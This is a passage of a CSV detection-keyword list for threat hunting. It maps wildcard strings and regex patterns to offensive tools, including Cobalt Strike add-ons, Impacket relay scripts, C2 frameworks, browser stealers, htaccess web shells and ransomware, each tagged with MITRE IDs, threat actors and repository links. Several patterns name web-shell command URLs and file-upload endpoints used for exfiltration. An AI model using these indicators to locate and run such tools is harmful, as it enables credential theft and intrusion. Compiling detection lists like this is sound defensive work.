RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","47578"
"*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","47579"
"*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47580"
"*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","47581"
"*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47582"
"*http-request-smuggler-all.jar*",".{0,1000}http\-request\-smuggler\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47583"
"*https://$1/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/$2*",".{0,1000}https\:\/\/\$1\/ui\/h5\-vsan\/rest\/proxy\/service\/com\.vmware\.vsan\.client\.services\.capability\.VsanCapabilityProvider\/\$2.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","47584"
"*https://*.gofile.io/uploadFile*",".{0,1000}https\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","47598"
"*https://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47603"
"*https://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47614"
"*https://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47615"
"*https://*.tuns.sh*",".{0,1000}https\:\/\/.{0,1000}\.tuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47619"
"*https://*/.htaccess?c=cmd*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47624"
"*https://*/.htaccess?c=uname -a*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47625"
"*https://*/releases/download/*/lse.sh*",".{0,1000}https\:\/\/.{0,1000}\/releases\/download\/.{0,1000}\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","47626"
"*https://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}https\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","47628"
"*https://{server}.gofile.io/uploadFile*",".{0,1000}https\:\/\/\{server\}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","47629"
"*https://0.0.0.0:1337*",".{0,1000}https\:\/\/0\.0\.0\.0\:1337.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","47630"
"*https://0day.today/exploit/*",".{0,1000}https\:\/\/0day\.today\/exploit\/.{0,1000}","offensive_tool_keyword","0day.today","a platform providing exploit code (free and paid)","T1588.002 - T1587.001 - T1190","TA0042  - TA0009","N/A","N/A","Exploitation tool","https://0day.today/","1","1","N/A","N/A","7","6","N/A","N/A","N/A","N/A","47633"
"*https://0x00sec.org/t/malware-development-1-password-stealers-chrome/33571*",".{0,1000}https\:\/\/0x00sec\.org\/t\/malware\-development\-1\-password\-stealers\-chrome\/33571.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","47634"
"*https://1.3.3.7:8081*",".{0,1000}https\:\/\/1\.3\.3\.7\:8081.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","47635"
"*https://127.0.0.1/dns-query*",".{0,1000}https\:\/\/127\.0\.0\.1\/dns\-query.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","47636"
"*https://127.0.0.1:5000/register*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/register.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","47637"
"*https://127.0.0.1:5000/results/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/results\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","47638"
"*https://127.0.0.1:5000/tasks/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/tasks\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","47639"
"*https://127.0.0.1:60443*",".{0,1000}https\:\/\/127\.0\.0\.1\:60443.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","47640"
"*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47641"
"*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","47642"
"*https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design*",".{0,1000}https\:\/\/5pider\.net\/blog\/2024\/01\/27\/modern\-shellcode\-implant\-design.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","47647"
"*https://adaptix-framework.gitbook.io/adaptix-framework/adaptix-c2/getting-starting/*",".{0,1000}https\:\/\/adaptix\-framework\.gitbook\.io\/adaptix\-framework\/adaptix\-c2\/getting\-starting\/.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","47649"
"*https://amsi.fail/*",".{0,1000}https\:\/\/amsi\.fail\/.{0,1000}","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47652"
"*https://api.fbi.gov/wanted/v1/list*",".{0,1000}https\:\/\/api\.fbi\.gov\/wanted\/v1\/list.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","47658"
"*https://api.github.com/orgs/gatoxtest/*",".{0,1000}https\:\/\/api\.github\.com\/orgs\/gatoxtest\/.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","47661"
"*https://api.localxpose.io/api/v2/downloads/loclx-darwin-amd64.zip*",".{0,1000}https\:\/\/api\.localxpose\.io\/api\/v2\/downloads\/loclx\-darwin\-amd64\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","#linux","N/A","10","","N/A","","","","47663"
"*https://api.onedrive.com/v1.0/drives/me/items/root:{onedrive_file_path}:/oneDrive.createUploadSession*",".{0,1000}https\:\/\/api\.onedrive\.com\/v1\.0\/drives\/me\/items\/root\:\{onedrive_file_path\}\:\/oneDrive\.createUploadSession.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47665"
"*https://api.sublist3r.com/search.php?domain=",".{0,1000}https\:\/\/api\.sublist3r\.com\/search\.php\?domain\=","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","47667"
"*https://auth.pico.sh/*",".{0,1000}https\:\/\/auth\.pico\.sh\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47680"
"*https://avred.r00ted.ch/upload*",".{0,1000}https\:\/\/avred\.r00ted\.ch\/upload.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","47681"
"*https://badkeys.info/*",".{0,1000}https\:\/\/badkeys\.info\/.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","47682"
"*https://best-wishes-to-you*",".{0,1000}https\:\/\/best\-wishes\-to\-you.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47685"
"*https://bin.ajam.dev//$(uname -m)/bash*",".{0,1000}https\:\/\/bin\.ajam\.dev\/\/\$\(uname\s\-m\)\/bash.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47686"
"*https://bin.equinox.io/c/4VmDzA7iaHb/*",".{0,1000}https\:\/\/bin\.equinox\.io\/c\/4VmDzA7iaHb\/.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","47687"
"*https://bitbucket.org/evilgreyswork/*",".{0,1000}https\:\/\/bitbucket\.org\/evilgreyswork\/.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","1","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","47695"
"*https://blog.sevagas.com/?Advanced-MacroPack-payloads-XLM-Injection*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?Advanced\-MacroPack\-payloads\-XLM\-Injection.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47696"
"*https://blog.sevagas.com/?Bypass-Windows-Defender-Attack-Surface-Reduction*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?Bypass\-Windows\-Defender\-Attack\-Surface\-Reduction.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47697"
"*https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?EXCEL\-4\-0\-XLM\-macro\-in\-MacroPack\-Pro.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47698"
"*https://blog.sevagas.com/?Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?Launch\-shellcodes\-and\-bypass\-Antivirus\-using\-MacroPack\-Pro\-VBA\-payloads.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47699"
"*https://bloodhound.readthedocs.io/en/latest/index.html*",".{0,1000}https\:\/\/bloodhound\.readthedocs\.io\/en\/latest\/index\.html.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","47700"
"*https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation*",".{0,1000}https\:\/\/book\.hacktricks\.xyz\/windows\-hardening\/windows\-local\-privilege\-escalation.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","47701"
"*https://browserling.com/tor-testing*",".{0,1000}https\:\/\/browserling\.com\/tor\-testing.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47704"
